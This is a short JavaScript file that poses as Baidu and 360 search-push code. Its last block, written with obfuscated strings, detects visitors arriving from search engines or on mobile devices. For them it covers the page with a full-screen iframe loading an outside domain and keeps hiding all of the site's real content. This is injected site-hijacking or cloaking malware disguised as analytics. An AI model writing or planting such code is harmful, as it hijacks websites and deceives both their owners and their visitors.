﻿var url = 'https://xhnf777.com/';
/*百度推送代码*/
var bp = document.createElement('script');
bp.src = '//push.zhanzhang.baidu.com/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
/*360推送代码*/
var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
document.write('<script src="' + src + '" id="sozz"><\/script>');
if(/\.ba\wdu\.com|\.so\.com|\.goo\wle\.com|\.so\wou\.com|\.sm\.cn/gi.test(document.referrer)||/ba\wduboxapp|mobile|phone|Android|iPhone|iPod|ios|iPad/i.test(navigator.userAgent)){
	var ss = '<ifr'+'ame id="ecshow" scrolling="auto" marginheight="0" marginwidth="0" frameborder="0" width="100%" height="100%" style="min-height:100vh" src="'+url+'"></iframe>';
	document.body?document.body.insertAdjacentHTML('afterBegin',ss):document.write(ss);
	setInterval(function(){for(var i=0;i<document.body.children.length;i++)if(document.body.children[i].id != "ecshow")document.body.children[i].style.display="no"+"ne";document.body.style.overflow="hidden";},100);
}